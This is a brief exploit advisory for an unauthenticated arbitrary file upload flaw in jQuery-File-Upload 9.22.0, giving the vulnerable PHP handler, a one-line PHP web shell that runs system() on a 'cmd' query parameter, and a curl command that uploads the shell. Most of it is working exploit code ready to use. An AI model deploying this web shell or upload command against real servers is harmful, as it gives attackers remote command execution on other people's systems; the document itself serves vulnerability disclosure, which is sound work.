# Title: jQuery-File-Upload 9.22.0 - Arbitrary File Upload
# Author: Larry W. Cashdollar, @_larry0
# Date: 2018-10-09
# Vendor: https://github.com/blueimp
# Download Site: https://github.com/blueimp/jQuery-File-Upload/releases
# CVE-ID: N/A

# Vulnerability:
# The code in https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php 
# doesn't require any validation to upload files to the server.  It also doesn't exclude file types.  
# This allows for remote code execution.

# shell.php:
<?php $cmd=$_GET['cmd']; system($cmd);?>

# Exploit Code:
$ curl -F "files=@shell.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php